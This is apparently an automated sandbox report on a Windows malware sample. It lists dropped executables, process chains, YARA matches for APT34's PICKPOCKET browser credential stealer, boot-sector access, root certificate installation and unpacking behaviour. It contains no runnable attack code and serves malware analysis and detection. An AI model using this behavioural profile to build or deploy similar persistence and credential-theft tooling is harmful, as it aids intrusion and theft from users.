Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000ABA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000B3B0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001EBD0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_100083F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000BC57
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000C483
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10010590
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1001EDDB
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_0574E58A
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05743C51
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05762F70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05760780
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_0574C019
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05753BFE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10009257
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10008340
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10010590
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_00404BE4

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: String function: 6D8A7EA0 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: String function: 05721320 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: String function: 008BE1C0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: String function: 008BEB60 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: String function: 008BE0E4 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: String function: 004067A9 appears 58 times

Source: h1GodtbhC8.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: h1GodtbhC8.exe, 00000000.00000002.804993481.000000006D920000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSibuia.dllN vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.794780503.0000000000902000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.794920585.000000000094E000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameSibClr.dll. vs h1GodtbhC8.exe

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Section loaded: dxgidebug.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: 0000000F.00000002.1022272308.00000000059A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000006.00000002.1010080806.0000000004870000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000F.00000002.1010698141.0000000004790000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.aliens.exe.4870000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.1E1C360C582DF797.exe.4790000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.1E1C360C582DF797.exe.10000000.8.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.aliens.exe.4870000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 6.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.1E1C360C582DF797.exe.4790000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 15.2.1E1C360C582DF797.exe.5720000.7.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 15.2.1E1C360C582DF797.exe.5270000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Source: classification engine

Classification label: mal87.bank.spyw.evad.winEXE@13/17@4/2

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Code function: 1_2_008A6E5E GetLastError,FormatMessageW,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8A1870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Source: C:\Users\user\AppData\Roaming\1607153318099.exe

Code function: 19_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_004024FB CoCreateInstance,

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_6D8A86A0 LoadResource,LockResource,SizeofResource,

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

File created: C:\Program Files (x86)\71eza90awf48

Jump to behavior

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File created: C:\Users\user\AppData\Local\Temp\nsh2645.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Command line argument: sfxname
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Command line argument: sfxstime
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Command line argument: STARTDLG

Source: h1GodtbhC8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\1607153318099.exe

System information queried: HandleInformation

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: h1GodtbhC8.exe	Virustotal: Detection: 27%
Source: h1GodtbhC8.exe	Metadefender: Detection: 16%
Source: h1GodtbhC8.exe	ReversingLabs: Detection: 64%

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File read: C:\Users\user\Desktop\h1GodtbhC8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\h1GodtbhC8.exe 'C:\Users\user\Desktop\h1GodtbhC8.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe' -s
Source: unknown	Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 137E5E97B7A1A176AEBB5BF742E73DAB C
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\1607153318099.exe 'C:\Users\user\AppData\Roaming\1607153318099.exe' /sjson 'C:\Users\user\AppData\Roaming\1607153318099.txt'
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe' -s
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Process created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Process created: C:\Users\user\AppData\Roaming\1607153318099.exe 'C:\Users\user\AppData\Roaming\1607153318099.exe' /sjson 'C:\Users\user\AppData\Roaming\1607153318099.txt'

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: h1GodtbhC8.exe

Static file information: File size 4671378 > 1048576

Source: h1GodtbhC8.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000001.00000002.793214399.00000000008D2000.00000002.00020000.sdmp
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1607153318099.exe, 00000013.00000002.995109481.000000000040F000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: h1GodtbhC8.exe, 00000000.00000002.794920585.000000000094E000.00000004.00000020.sdmp, SibClr.dll.0.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: h1GodtbhC8.exe, 00000000.00000002.804854964.000000006D905000.00000002.00020000.sdmp, Sibuia.dll.0.dr
Source:	Binary string: C:\Users\Lenny\Documents\nsis-3.01-src\build\urelease\stub_zlib-x86-ansi\stub_zlib.pdb source: aliens.exe, 00000006.00000002.1007540272.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 0000000F.00000002.1007578546.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000012.00000000.1051421766.0000000000409000.00000002.00020000.sdmp, aliens.exe.1.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 1E1C360C582DF797.exe, 0000000F.00000002.1021076640.000000000543E000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: h1GodtbhC8.exe, 00000000.00000002.804854964.000000006D905000.00000002.00020000.sdmp, Sibuia.dll.0.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Unpacked PE file: 6.2.aliens.exe.4870000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Unpacked PE file: 15.2.1E1C360C582DF797.exe.4790000.5.unpack

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

File created: C:\Program Files (x86)\71eza90awf48\__tmp_rar_sfx_access_check_4533906

Jump to behavior

Source: 1E1C360C582DF797.exe.6.dr	Static PE information: real checksum: 0xe6954 should be:
Source: h1GodtbhC8.exe	Static PE information: real checksum: 0x0 should be: 0x47db98
Source: aliens.exe.1.dr	Static PE information: real checksum: 0xe6954 should be:

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Code function: 0_2_6D8DF9A8 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BE0E4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Code function: 1_2_008BEBA6 push ecx; ret
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10014194 push 33000001h; retf
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10014296 push ebp; ret
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: 6_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_05748D9A push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_0574EB91 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10014194 push 33000001h; retf
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10014296 push ebp; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: 15_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1607153318099.exe	Code function: 19_2_0040E340 push eax; ret

Source: initial sample	Static PE information: section name: .text entropy: 6.82101260035
Source: initial sample	Static PE information: section name: .text entropy: 6.82101260035

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d

Installs new ROOT certificates

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	File created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	File created: C:\Users\user\AppData\Local\Temp\nsh2646.tmp\Sibuia.dll	Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	File created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	File created: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\SibClr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	File created: C:\Program Files (x86)\71eza90awf48\aliens.exe	Jump to dropped file

Source: C:\Users\user\Desktop\h1GodtbhC8.exe

File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe

Code function: 15_2_0586BE50 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA,

Boot Survival:

Contains functionality to infect the boot sector

Show sources

Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d

Source: C:\Users\user\AppData\Roaming\1607153318099.exe

Code function: 19_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib26E3.tmp\0\setup.exe	Process information set: NOOPENFILEERRORBOX
